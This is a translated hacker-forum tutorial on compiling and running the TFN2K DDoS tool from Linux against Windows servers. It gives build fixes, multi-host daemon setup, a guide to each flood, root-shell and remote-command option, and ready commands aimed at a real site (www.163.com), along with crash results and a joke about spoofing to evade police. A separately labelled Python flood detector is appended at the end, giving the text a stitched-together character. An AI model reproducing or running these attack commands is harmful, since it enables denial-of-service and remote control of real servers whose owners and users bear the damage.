Using a Linux system to run DDoS attacks against Windows servers

Description

The test uses Red Hat Linux, the best-known distribution at the moment; for this attack test I am using Fedora Core 3. The software is the best-known DDoS attack tool, TFN2K, in its Linux version. The system being attacked is a Windows 2000 Server running Apache 2, FTP and VNC; the other services matter little, since the attack is mainly aimed at Apache.

0. Extract the archive: tar -zxvf tfn2k.tgz

1. Install TFN2K
TFN2K is open-source software, so it has to be compiled. That needs little explanation and the build should normally go through, but a few points need attention, because different Linux versions and vendors require different settings.
Modify src/ip.h:
Comment out the following section, otherwise the compile fails.

/*struct in_addr
{
unsigned long int server_address;
};*/
Then run make to compile.
During compilation you are prompted to set a server password (8-32 characters), which has to be entered when attacking. After compilation two new files appear, td and tfn: td is the daemon, the process used on the clients, and tfn is the server control process. To attack someone you must first start the td process and then run the server process, otherwise the attack has no effect. To change the password, run mkpass. Finally, install and run td on all of the clients (root privileges are required), and on the server create a text file listing the IP addresses of all the clients (vi works for editing it), in this format:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
.....
Then run ./tfn on the primary server.
2. Attack
Running ./tfn on its own and pressing Enter lists the parameters; friends whose English is good probably don't need me to say more :)
Format: ./tfn <parameter>
We won't cover the parameters that aren't needed; the ones used for attacking are:
-f  followed by the name of the text file just written; this is what makes it a real DDoS attack rather than a DoS
-h  DoS attack, i.e. a single machine attacking one-on-one; followed by a host name or IP address
-p  followed by a port, no explanation needed
-c  the most critical parameter, with 11 options in total:
0 - stop the attack, how kind
1 - set the anti-spoofing level: when attacking, TFN sends packets that carry a source address, but the source address is random, that is to say the address is not your own, so don't worry about the cops, haha
2 - change the packet size: by default the ICMP/8, smurf and UDP attacks use small packets. You can increase the size by changing the number of payload bytes in each packet.
3 - bind root shell: starts a session service; connecting to the specified port then gives you a root shell.
4 - UDP flood attack: this attack exploits the fact that for each UDP packet sent to a closed port, an ICMP unreachable message is returned, which increases the attack's strength.
5 - SYN flood attack: this attack steadily sends fake connection requests. The result is denial of service on the target port and a filled-up TCP connection table, and TCP/RST responses to nonexistent hosts add to the attack's potential. It is the standard denial-of-service attack.
6 - ICMP echo (ping) attack: this attack sends ping requests with fake source addresses, and the target host sends back response packets of the same size.
7 - SMURF attack: sends ping requests carrying the target host's address to broadcast amplifiers, so that the target host receives the replies multiplied many times over.
8 - MIX attack: sends UDP, SYN and ICMP packets alternately in a 1:1:1 ratio, which lets it take on routers, other packet-forwarding devices, NIDS, sniffers and so on, bombing them in turn :)
9 - TARGA3 attack
10 - remote command execution: this is an additional feature of TFN; in fact TFN is not only for DoS attacks, it can also be used for remote control, for example:
./tfn -f hostext -c 10 -i "mkdir /root/edison" creates the directory edison in root's home directory on all of the hosts; -i is followed by the "command".
That covers the basic parameters; the attacks follow.
./tfn -f hostext -c 4 -i www.163.com
Uses the hosts recorded in the hostext file to run a UDP attack against the 163 server (the td process must already be running on all of the hosts).
./tfn -f hostext -c 5 -i www.163.com -p 80
Uses the hosts recorded in the hostext file to run a TCP denial-of-service attack against the 163 server (port 80 attacks the web service; the rest needs no explanation).
./tfn -f hostext -c 6 -i www.163.com
Uses the hosts recorded in the hostext file to run an ICMP attack against the 163 server (ping attack; a buffer overflow crashes it immediately).
./tfn -f hostext -c 8 -i www.163.com
Uses the hosts recorded in the hostext file to attack the 163 server with ICMP, TCP and UDP in turn (if the other side is running a sniffer, it will certainly be crying its eyes out).
./tfn -f hostext -c 0
Makes the hosts stop the attack.

Test results:
One-on-one, TCP connection attack: the attacking machine's CPU at 13%, the attacked server's CPU usage above 70%, fluctuating from time to time.
Two-on-one, TCP connection attack: each attacking machine's CPU at 13%, the attacked server's CPU usage at 100%.
Five-on-one, TCP connection attack: each attacking machine's CPU at 13%, the attacked server crashed.
I only have 6 machines at home, but with a few more, say dozens of machines, a typical personal server would definitely go down.
One-on-one, ICMP attack: the attacking machine's CPU at 18%, the attacked server's CPU usage at 96% or more, fluctuating constantly.
Two-on-one, ICMP attack: each attacking machine's CPU at 18%, the attacked server could not get on the network and was almost unusable, and crashed within half an hour.
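
Seen from the attacked server, the flood modes listed above leave recognisable traces: many distinct random source addresses, SYNs whose senders never complete a handshake, and ICMP port-unreachable replies leaving the server for every UDP packet that hit a closed port. The detector below is an added example, not part of the original article or of TFN2K; the record format, thresholds and addresses are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict

SERVER = "192.0.2.10"  # constructed victim address (RFC 5737 documentation range)
KINDS = {("tcp", "SYN"): "syn", ("udp", "data"): "udp", ("icmp", "echo-request"): "icmp-echo"}

def build_sample():
    """Constructed capture window of (src, dst, proto, detail) records."""
    pkts = []
    for i in range(300):
        spoofed = f"198.51.100.{i % 250 + 1}"               # random-looking source
        pkts.append((spoofed, SERVER, "tcp", "SYN"))        # SYN that is never ACKed
        pkts.append((spoofed, SERVER, "udp", "data"))       # UDP to a closed port
        pkts.append((SERVER, spoofed, "icmp", "port-unreachable"))  # server's reply
    for _ in range(5):                                      # one legitimate client
        pkts.append(("192.0.2.77", SERVER, "tcp", "SYN"))
        pkts.append(("192.0.2.77", SERVER, "tcp", "ACK"))
    return pkts

def classify_floods(pkts, min_pkts=200, min_sources=100):
    """Return {host: sorted flood labels} for one capture window."""
    count = defaultdict(Counter)                      # host -> packets received, by kind
    sources = defaultdict(lambda: defaultdict(set))   # host -> kind -> source addresses
    acked = defaultdict(set)          # host -> sources that completed a handshake
    unreachable = Counter()           # host -> port-unreachable messages it sent
    for src, dst, proto, detail in pkts:
        if proto == "icmp" and detail == "port-unreachable":
            unreachable[src] += 1
        elif proto == "tcp" and detail == "ACK":
            acked[dst].add(src)
        elif (proto, detail) in KINDS:
            kind = KINDS[(proto, detail)]
            count[dst][kind] += 1
            sources[dst][kind].add(src)
    verdict = {}
    for host, kinds in count.items():
        labels = []
        for kind, n in kinds.items():
            srcs = sources[host][kind]
            if n < min_pkts or len(srcs) < min_sources:
                continue              # too few packets or sources for a spoofed flood
            if kind == "syn" and len(srcs - acked[host]) < 0.9 * len(srcs):
                continue              # most sources finish the handshake: real clients
            if kind == "udp" and unreachable[host] < 0.5 * n:
                continue              # port is open, no closed-port backscatter
            labels.append(kind + "-flood")
        if labels:
            verdict[host] = sorted(labels)
    return verdict
```

A busy but legitimate server stays unflagged because its clients complete the handshake; all three labels on one host at once corresponds to the MIX mode.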


Source: http://www.myhack58.com/Article/html/3/62/2006/12500.htm (myhack58, published 2006-10-25)